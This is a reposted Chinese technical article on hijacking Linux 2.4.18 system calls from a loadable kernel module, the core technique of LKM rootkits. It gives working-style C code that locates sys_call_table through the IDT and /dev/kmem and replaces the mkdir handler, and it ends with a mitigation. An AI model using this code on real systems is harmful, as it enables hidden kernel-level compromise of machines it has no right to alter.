Linux2.4.18内核下的系统调用劫持 [转]

news/2024/7/11 0:12:14 标签: linux, table, module, system, struct, path
 注:本文提到的方法和技巧,如有兴趣请参考后面提到的两篇参考文章,虽然比较老了,但是对于本文内容的实现有很大的参考价值。因为篇幅关系,没有列出完整代码,但是核心代码已经全部给出。
Linux 现在使用是越来越多了,因此Linux的安全问题现在也慢慢为更多人所关注。Rootkit是攻击者用来隐藏踪迹和保留root访问权限的工具集,在这些 工具当中,基于LKM的rootkit尤其受到关注。这些rootkit可以实现隐藏文件、隐藏进程、重定向可执行文件,给linux的安全带来很大的威 胁,它们所用到的技术主要是系统调用劫持。用LKM技术截获系统调用的通常步骤如下:
找到需要的系统调用在sys_call_table[]中的入口(参考include/sys/syscall.h) 
保存sys_call_table[x]的旧入口指针。(x代表所想要截获的系统调用的索引) 
将自定义的新的函数指针存入sys_call_table[x]
在Linux2.4.18内核以前,可以将sys_call_table导出来直接使用。因此修改系统调用非常容易,下面看一个例子:
extern void* sys_call_table[];/*sys_call_table被引入,所以可以存取*/ 
int (*orig_mkdir)(const char *path); /*保存原始系统调用的函数指针*/
int hacked_mkdir(const char *path)
{
return 0; /*一切正常,除了新建操作,该操作什么也不做*/
}
int init_module(void) /*初始化模块*/
{
orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hacked_mkdir;
return 0;
}
void cleanup_module(void) /*卸载模块*/
{
sys_call_table[SYS_mkdir]=orig_mkdir; /*恢复mkdir系统调用到原来的那个*/
}
在Linux2.4.18内核以后,为了解决这个安全问题,sys_call_table不能直接导出,因此上面这个代码拿到Linux2.4.18内核之后的内核上去编译加载,会在加载时报错。那么要怎么样才能得到sys_call_table,实现系统调用劫持呢?
一.怎么样得到sys_call_table的地址
1./dev/kmem
先 看一下来自Linux手册页(man kmem)的介绍:“kmem是一个字符设备文件,是计算机主存的一个影象。它可以用于测试甚至修改系统。”也就是 说,读取这个设备可以得到内存中的数据,因此,sys_call_table的地址也可以通过设备找到。这个设备通常只有root用户才有rw权限,因此 只有root才能实现这些操作。
2.系统调用过程简述
每一个系统调用都是通过int 0x80中断进入核心,中断描述符表把中断服务程序和中断向量对应起来。对于系统调用来说,操作系统会调用system_call中断服务程序。system_call函数在系统调用表中根据系统调用号找到并调用相应的系统调用服务例程。
3.得到sys_call_table地址的过程
idtr 寄存器指向中断描述符表的起始地址,用sidt[asm ("sidt %0" : "=m" (idtr));]指令得到中断描述符表起始地址,从这条 指令中得到的指针可以获得int 0x80中断服描述符所在位置,然后计算出system_call函数的地址。现在反编译一下system_call函 数看一下:
$ gdb -q /usr/src/linux/vmlinux
(no debugging symbols found)...(gdb) disass system_call
Dump of assembler code for function system_call:
……
0xc0106bf2 <system_call+42>: jne 0xc0106c48 <tracesys>
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4) 
0xc0106bfb <system_call+51>: mov %eax,0x18(%esp,1)
0xc0106bff <system_call+55>: nop
End of assembler dump.
(gdb) print &sys_call_table
$1 = (<data variable, no debug info> *) 0xc01e0f18 
(gdb) x/xw (system_call+44)
0xc0106bf4 <system_call+44>: 0x188514ff <-- 得到机器指令 (little endian)
(gdb)
我 们可以看到在system_call函数内,是用call *0xc01e0f18指令来调用系统调用函数的。因此,只要找到system_call里的 call sys_call_table(,eax,4)指令的机器指令就可以了。我们使用模式匹配的方式来获得这条机器指令的地址。这样就必须读取 /dev/kmem里面的数据。
二.如何在module里使用标准系统调用
处理/dev/kmem里的数据只需要用标准的系统调用就可以了,如:open,lseek,read。
module里不能使用标准系统调用。为了在module里使用标准系统调用,我们要在module里实现系统调用函数。看看内核源代码里的实现吧:
#define __syscall_return(type, res) /
do { /
    if ((unsigned long)(res) >= (unsigned long)(-125)) { /
        errno = -(res); /
        res = -1; /
    } /
    return (type) (res); /
} while (0)
#define _syscall1(type,name,type1,arg1) /
type name(type1 arg1) /
{ /
long __res; /
__asm__ volatile ("int $0x80" /
    : "=a" (__res) /
    : "0" (__NR_##name),"b" ((long)(arg1))); /
__syscall_return(type,__res); /
}
static inline _syscall1(int,close,int,fd)
我们可以学习这样的方法,这样只要将这些代码加入到我们的module的代码里面,就可以在module里使用这些标准系统调用了。
另 外,为了用匹配搜索的方式查找sys_call_table的地址,我们可以用memmem函数。不过memmem是GNU C扩展的函数,它的函数原型 是:void *memmem(void *s,int s_len,void *t,int t_len);同样的,module里也不能使用库函数, 但是我们可以自己实现这个函数。
然而在module里使用标准系统调用还有个问题,系统调用需要的参数要求要在用户空间而不是在module所在的内核空间。
Linux 使用了段选器来区分内核空间、用户空间等等。被系统调用所用到的而存放在用户空间中的参数应该在数据段选器(所指的)范围的某个地方。DS能够用 asm/uaccess.h中的get_ds()函数得到。只要我们把被内核用来指向用户段的段选器设成所需要的 DS值,我们就能够在内核中访问系统调 用所用到的(那些在用户地址空间中的)那些用做参数值的数据。这可以通过调用set_fs(...)来做到。但要小心,访问完系统调用的参数后,一定要恢 复FS。下面是一段例子:
filename内核空间;比如说我们刚创建了一个字串
unsigned long old_fs_value=get_fs();
set_fs(get_ds); /*完成之后就可以存取用户空间了*/
open(filename, O_CREAT|O_RDWR|O_EXCL, 0640);
set_fs(old_fs_value); /*恢复 fs ...*/
三.在module里实现sys_call_table地址查找的代码实现
主要代码如下:
/*实现系统调用*/
unsigned long errno;
#define __syscall_return(type, res) /
do { /
    if ((unsigned long)(res) >= (unsigned long)(-125)) { /
        errno = -(res); /
        res = -1; /
    } /
    return (type) (res); /
} while (0)
#define _syscall1(type,name,type1,arg1) /
type name(type1 arg1) /
{ /
long __res; /
__asm__ volatile ("int $0x80" /
    : "=a" (__res) /
    : "0" (__NR_##name),"b" ((long)(arg1))); /
__syscall_return(type,__res); /
}
#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) /
type name(type1 arg1,type2 arg2,type3 arg3) /
{ /
long __res; /
__asm__ volatile ("int $0x80" /
    : "=a" (__res) /
    : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), /
         "d" ((long)(arg3))); /
__syscall_return(type,__res); /
}
static inline _syscall3(int,write,int,fd,const char *,buf,off_t,count)
static inline _syscall3(int,read,int,fd,char *,buf,off_t,count)
static inline _syscall3(off_t,lseek,int,fd,off_t,offset,int,count)
static inline _syscall3(int,open,const char *,file,int,flag,int,mode)
static inline _syscall1(int,close,int,fd)
/*从这里以后就可以使用这几个系统调用了*/

struct {
unsigned short limit;
unsigned int base;
} __attribute__ ((packed)) idtr;
struct {
unsigned short off1;
unsigned short sel;
unsigned char none,flags;
unsigned short off2;
} __attribute__ ((packed)) idt;
int kmem;
void readkmem (void *m,unsigned off,int sz)
{
    mm_segment_t old_fs_value=get_fs();
set_fs(get_ds());    
if (lseek(kmem,off,0)!=off) {
printk("kmem lseek error in read/n" ; return;
}
if (read(kmem,m,sz)!=sz) {
printk("kmem read error!/n" ; return;
}
    set_fs(old_fs_value);
}
#define CALLOFF 100 /* 我们将读出int $0x80的头100个字节 */
/*得到sys_call_table的地址*/
unsigned getscTable()
{
unsigned sct;
unsigned sys_call_off;
char sc_asm[CALLOFF],*p;
/* 获得IDTR寄存器的值 */
asm ("sidt %0" : "=m" (idtr));
     mm_segment_t old_fs_value=get_fs(); 
     const char *filename="/dev/kmem";
     set_fs(get_ds()); 
/* 打开kmem */
kmem = open (filename,O_RDONLY,0640);
if (kmem<0)
     { 
            printk("open error!" ;
     }
     set_fs(old_fs_value);
/* 从IDT读出0x80向量 (syscall) */
readkmem (&idt,idtr.base+8*0x80,sizeof(idt));
sys_call_off = (idt.off2 << 16) | idt.off1;
/* 寻找sys_call_table的地址 */
readkmem (sc_asm,sys_call_off,CALLOFF);
p = (char*)mymem (sc_asm,CALLOFF,"/xff/x14/x85",3);
sct = *(unsigned*)(p+3);
     close(kmem);
        return sct;
}
好了,但是上面的函数没有做足够的错误检查。
四.劫持系统调用
在得到了sys_call_table的地址后,我们就可以很轻易的劫持系统调用了。
我们把最开始的那个例子修改一下,让它运行在2.4.18的内核。
系统调用的劫持过程主要代码如下:
static unsigned SYS_CALL_TABLE_ADDR;
void **sys_call_table;
int init_module(void)
{
SYS_CALL_TABLE_ADDR= getscTable();
    sys_call_table=(void **)SYS_CALL_TABLE_ADDR;
    orig_mkdir=sys_call_table[__NR_mkdir];
    sys_call_table[__NR_mkdir]=hacked_mkdir;
    return 0;    
}
void cleanup_module(void)
{
    sys_call_table[__NR_mkdir]=orig_mkdir;
}
五.综述
虽然内核2.4.18以后不再导出sys_call_table,但是我们仍然可以通过读/dev/kmem设备文件得到它的地址,来实现系统调用的劫持。要解决这个问题,最好是使/dev/kmem不可读,或者干脆不使用这个设备文件。否则,总会给安全带来隐患。
参考资料:
Phrack58-0x07 Linux on-the-fly kernel patching without LKM 
(nearly) Complete Linux Loadable Kernel Modules -the definitive guide for hackers, virus coders and system administrators- written by pragmatic / THC, version 1.0 released 03/1999



因不能导出sys_call_table,故可动态加载模块完全指南中需要修改

http://www.niftyadmin.cn/n/841549.html

相关文章

源码编译构建JSVC执行程序

从apache下载 commons-daemon的源代码&#xff0c;配置JAVA_HOME环境变量。 1. 首先安装编译环境的依赖&#xff1a; autoconf gcc make jdk 2. 进入源代码目录&#xff1a;/path/to/commons-daemon-src/src/native/unix 3. 执行如下命令&#xff1a; sh support/buildconf…

SQL数据库查询实现行转列与列转行结果SQL语句(适用于SqlServer数据库,oracle需要修改case when语句)

文章来源&#xff1a;http://blog.csdn.net/zhangshengboy/article/details/6431724行转列&#xff0c;列转行是我们在开发过程中经常碰到的问题。行转列一般通过CASE WHEN 语句来实现&#xff0c;也可以通过 SQL SERVER 2005 新增的运算符PIVOT来实现。 用传统的方法&#xff…

spinlock的设计和实现

http://www.linuxforum.net/forum/gshowflat.php?Cat&BoardlinuxK&Number263448&page4&viewcollapsed&sb5&oall&fpart 在Linux的内核中&#xff0c;spin lock用在多处理器环境中。当一个CPU访问一个临界资源 (critical section)的时候&#x…

UVA10129 POJ1386 HDU1116 ZOJ2016 Play on Words【欧拉回路+并查集】

问题链接&#xff1a;UVA10129 POJ1386 HDU1116 ZOJ2016 Play on Words。 问题简述&#xff1a;先输入测试用例数T&#xff0c;每个测试用例包括整数N和N个单词数&#xff0c;问这些单词首尾字母能否接成一条龙&#xff1f; 问题分析&#xff1a;这是一个单词接龙问题&#xff…

android悬浮窗语音识别demo

带有android悬浮窗的语音识别语义理解demo 如发现代码排版问题&#xff0c;请访问CSDN博客 转载请注明CSDN博文地址&#xff1a;http://blog.csdn.net/ls0609/a... 在线听书demo&#xff1a;http://blog.csdn.net/ls0609/a... 语音记账demo&#xff1a;http://blog.csdn.net/l…

数据挖掘 可以挖掘什么类型的数据?

作为一种通用技术&#xff0c;数据挖掘可以用于任何类型的数据&#xff0c;只要数据对目标应用是有意义的。 对于挖掘的应用&#xff0c;数据的最基本形式是数据库数据、数据仓库数据和事务数据。数据挖掘也可以用于其他类型的数据(例如&#xff0c;数据流、有序/序列数据、图…

多个关联连接,出现无查询结果---经验(oracle数据库)

文章来源&#xff1a;http://blog.csdn.net/zhangshengboy/article/details/6434190 我的是多个做个左关联&#xff0c;出现无查询结果&#xff0c;其实每个关联的表都有数据 SELECT C.*,T.*,B.*,P.* FROM JX_CLASSROOM_INFO C, JX_TEACHFUN_INFO T ,ZC_TEACHBUILD_INFO B,X…

重新开始噼里啪啦写小文字啦~

又开始噼里啪啦的写一些有的没有的啦~ 努力慢慢养成一些小爱好&#xff0c;虽然是个比较懒的人的说【捂脸笑 先来阐述下最近遇到的两个很不技术的技术小问题&#xff1a; 1.pl/sql developer的安装与配置 最近一直在干的活其实说起来也蛮水的&#xff0c;就是做一些简单的数据工…